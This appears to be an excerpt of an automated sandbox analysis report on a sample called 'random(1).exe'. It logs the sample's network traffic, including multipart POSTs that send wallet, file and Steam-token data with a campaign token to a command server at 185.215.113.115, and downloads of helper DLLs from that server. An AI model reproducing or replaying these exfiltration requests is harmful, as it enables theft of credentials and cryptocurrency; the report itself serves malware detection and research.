6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 41 46 48 43 42 41 4b 46 43 41 41 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 41 46 48 43 42 41 4b 46 43 41 41 4b 46 43 46 43 2d 2d 0d 0a Data Ascii: ------FHIDAFHCBAKFCAAKFCFCContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------FHIDAFHCBAKFCAAKFCFCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FHIDAFHCBAKFCAAKFCFCContent-Disposition: form-data; name="file"------FHIDAFHCBAKFCAAKFCFC--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJEHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 32 32 35 39 66 64 61 34 64 35 62 34 30 39 66 34 32 38 33 37 31 37 35 39 66 39 39 31 32 30 66 66 37 34 64 65 65 64 66 34 36 33 32 62 63 66 38 64 39 36 62 37 35 32 33 36 36 64 39 31 64 35 38 34 30 65 38 61 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 2d 2d 0d 0a Data Ascii: ------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="file"------GHDAAKJEGCFCAKEBKJJE--
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 185.215.113.115Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCGHCBKFCFBFHIDHDBFHost: 185.215.113.115Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 32 32 35 39 66 64 61 34 64 35 62 34 30 39 66 34 32 38 33 37 31 37 35 39 66 39 39 31 32 30 66 66 37 34 64 65 65 64 66 34 36 33 32 62 63 66 38 64 39 36 62 37 35 32 33 36 36 64 39 31 64 35 38 34 30 65 38 61 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 2d 2d 0d 0a Data Ascii: ------EGCGHCBKFCFBFHIDHDBFContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------EGCGHCBKFCFBFHIDHDBFContent-Disposition: form-data; name="message"wallets------EGCGHCBKFCFBFHIDHDBF--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAKEBGDAFHIIDHIIECFHost: 185.215.113.115Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 32 32 35 39 66 64 61 34 64 35 62 34 30 39 66 34 32 38 33 37 31 37 35 39 66 39 39 31 32 30 66 66 37 34 64 65 65 64 66 34 36 33 32 62 63 66 38 64 39 36 62 37 35 32 33 36 36 64 39 31 64 35 38 34 30 65 38 61 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 2d 2d 0d 0a Data Ascii: ------AAAKEBGDAFHIIDHIIECFContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------AAAKEBGDAFHIIDHIIECFContent-Disposition: form-data; name="message"files------AAAKEBGDAFHIIDHIIECF--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIIEBGCAAECBGCBGCBKHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 49 49 45 42 47 43 41 41 45 43 42 47 43 42 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 32 32 35 39 66 64 61 34 64 35 62 34 30 39 66 34 32 38 33 37 31 37 35 39 66 39 39 31 32 30 66 66 37 34 64 65 65 64 66 34 36 33 32 62 63 66 38 64 39 36 62 37 35 32 33 36 36 64 39 31 64 35 38 34 30 65 38 61 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 49 45 42 47 43 41 41 45 43 42 47 43 42 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 49 45 42 47 43 41 41 45 43 42 47 43 42 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 49 45 42 47 43 41 41 45 43 42 47 43 42 47 43 42 4b 2d 2d 0d 0a Data Ascii: ------AFIIEBGCAAECBGCBGCBKContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------AFIIEBGCAAECBGCBGCBKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AFIIEBGCAAECBGCBGCBKContent-Disposition: form-data; name="file"------AFIIEBGCAAECBGCBGCBK--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 185.215.113.115Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 32 32 35 39 66 64 61 34 64 35 62 34 30 39 66 34 32 38 33 37 31 37 35 39 66 39 39 31 32 30 66 66 37 34 64 65 65 64 66 34 36 33 32 62 63 66 38 64 39 36 62 37 35 32 33 36 36 64 39 31 64 35 38 34 30 65 38 61 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 2d 2d 0d 0a Data Ascii: ------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="message"ybncbhylepme------JJJKFBAAAFHJEBFIEGID--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCAHost: 185.215.113.115Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 32 32 35 39 66 64 61 34 64 35 62 34 30 39 66 34 32 38 33 37 31 37 35 39 66 39 39 31 32 30 66 66 37 34 64 65 65 64 66 34 36 33 32 62 63 66 38 64 39 36 62 37 35 32 33 36 36 64 39 31 64 35 38 34 30 65 38 61 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 2d 2d 0d 0a Data Ascii: ------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------DHIEBAAKJDHIECAAFHCA--
              Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
              Source: Joe Sandbox ViewIP Address: 185.215.113.115 185.215.113.115
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49733 -> 185.215.113.115:80
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49759 -> 185.215.113.115:80
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C59CC60 PR_Recv,0_2_6C59CC60
              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239385917469_1PJ7CJICMRWKJR5SF&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239385917470_1O4L0U46N29EF81I2&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239354941421_1QFMKZTDAH37OHMPJ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239354941422_128KB82EECTAVENHE&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239400678274_1AGJJ9P2O7V6V1431&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239400678275_1MGQ4V998SN0MOXXU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: apis.google.com
              Source: global trafficDNS traffic detected: DNS query: play.google.com
              Source: unknownHTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 907sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: random(1).exe, 00000000.00000002.2013235084.000000000089E000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.115
              Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/freebl3.dll
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/freebl3.dllO
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/freebl3.dllbN
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/mozglue.dll
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/mozglue.dlle
              Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/msvcp140.dll
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/msvcp140.dllBN
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/msvcp140.dllzN
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/nss3.dll
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/nss3.dllw
              Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2025447897.000000000B6A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/softokn3.dll
              Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/softokn3.dllA
